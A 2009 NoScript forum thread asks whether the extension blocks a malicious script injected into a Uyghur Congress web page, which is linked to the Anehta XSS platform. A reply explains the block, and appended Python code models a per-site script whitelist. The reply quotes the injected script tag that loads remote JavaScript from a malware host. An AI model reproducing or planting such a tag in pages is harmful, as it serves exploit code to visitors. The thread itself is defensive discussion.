anehta from axis - does NoScript protect?

General discussion about the NoScript extension for Firefox
luntrus
Senior Member
Posts: 237
Joined: Sat Mar 21, 2009 6:29 pm

anehta from axis - does NoScript protect?

Post by luntrus » Mon Jul 27, 2009 3:46 pm

Hi forum members,

Look at the following malcode analysis:
exploit
Here are the details I encountered:

1. Virus identified: JS-CVE-2009-1136-A[Expl] (which is an Exploit)
2. Web address: wXw.uyghurcongress.org/En/home.asp
3. Malicious file identified by Avast!: m2m.net84.net/cn/document.js

Mentioned site with this document.js is the malcode residing site:

Code:

[EDITED by me for security reasons and against scanner detection]^^script src="htxtp://m2m.net84.net/cn/document.js"^^/script 

And this is:
Title:
HTTP Error 403 Forbidden
URL: hXtp://m2m.net84.net/cn
Redirects: 301 -> hXtp://m2m.net84.net/cn/
where I find the following:

Code:

 [again EDITED by me]
^a href="anehta-v0.6.0fixed/" anehta-v0.6.0fixed/^/a></li

And this is at the crux of the malcode, because Description (packet storm's):
Anehta is a PHP/Javascript based platform to make cross site scripting and other web attacks easier.
Author: axis
Homepage: hXtp://code.google.com/p/anehta/
File Size: 5596731
Last Modified: Nov 25 17:46:32 2008
MD5 Checksum: 5316c6cb785caef595c58e80a97f4ce8
More info on this new XSS platform: http://archives.neohapsis.com/archives/ ... /0565.html
other redirect is to:
302 -> hXtp://error.000webhost.com/forbidden.html

Is NoScript protecting us against anehta driven exploits?

luntrus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.0 (KHTML, like Gecko) Iron/3.0.189.0 Safari/531.0

therube
Ambassador
Posts: 7570
Joined: Thu Mar 19, 2009 4:17 pm
Location: Maryland USA

Re: anehta from axis - does NoScript protect?

Post by therube » Tue Jul 28, 2009 12:39 am

First, when you visit uyghurcongress (presumably) JavaScript is not allowed, so the exploit is thwarted right there.

Code:

<script src="http://m2m.net84.net/cn/document.js"></script>


Second, even if you do Allow JavaScript on uyghurcongress, the exploit is still hosted on a foreign domain, so again the exploit is thwarted.

Third, the exploit page itself doesn't seem to be returning anything at the moment.
(I wonder if it might only do something if you're visiting from a .cn domain?)

Code:

Secur1ty just lik3 a grl. B0th of th3m h4ve s0me h0les. Y0u alw4ys try to f1nd the h0le, but n0t 3very tim3 y0u c4n 3xpl0it it!
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.1pre) Gecko/20090717 SeaMonkey/2.0b1
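To illustrate the two checks therube describes (the page's own site must be allowed before any of its scripts run, and a script pulled from a foreign host is then judged on its own host), here is an added Python model of a NoScript-style per-site whitelist. It is example code written for this thread, not NoScript's implementation; the page URL, hostnames and HTML are constructed for the demonstration, and the "last two labels" rule for a site is a deliberate simplification.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample page: a first-party site that includes a script from an
# unrelated host (same shape as the injected tag discussed in the thread).
SAMPLE_PAGE_URL = "http://www.example-news.test/En/home.asp"
SAMPLE_HTML = """<html><body>
<script src="http://cdn.third-party.test/cn/document.js"></script>
<script>var tracker = 1;</script>
<script src="/js/site.js"></script>
</body></html>"""


class ScriptCollector(HTMLParser):
    """Record the src of every <script> tag; inline scripts are recorded as None."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.scripts.append(dict(attrs).get("src"))


def base_domain(host):
    # Simplification of a per-site whitelist: treat the last two labels as the
    # site (www.example.test -> example.test). Real public-suffix handling is
    # more involved; this is enough to show the policy.
    labels = host.lower().split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def evaluate_scripts(page_url, html, allowed_sites):
    """Return (resolved_src, verdict) per script. Check 1: the page's own site
    must be allowed. Check 2: an external script's host must be allowed too.
    Only a script passing both gets the verdict 'runs'."""
    page_site = base_domain(urlparse(page_url).hostname)
    collector = ScriptCollector()
    collector.feed(html)
    results = []
    for src in collector.scripts:
        if src is None:
            resolved, host_site = "<inline>", page_site
        else:
            resolved = urljoin(page_url, src)  # relative src stays first-party
            host_site = base_domain(urlparse(resolved).hostname)
        if page_site not in allowed_sites:
            verdict = "blocked: page site %s not allowed" % page_site
        elif host_site not in allowed_sites:
            verdict = "blocked: script host %s not allowed" % host_site
        else:
            verdict = "runs"
        results.append((resolved, verdict))
    return results
```

With an empty whitelist every script on the sample page is blocked at the first check; allowing only example-news.test lets the inline and first-party scripts run while the third-party host is still blocked at the second check.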
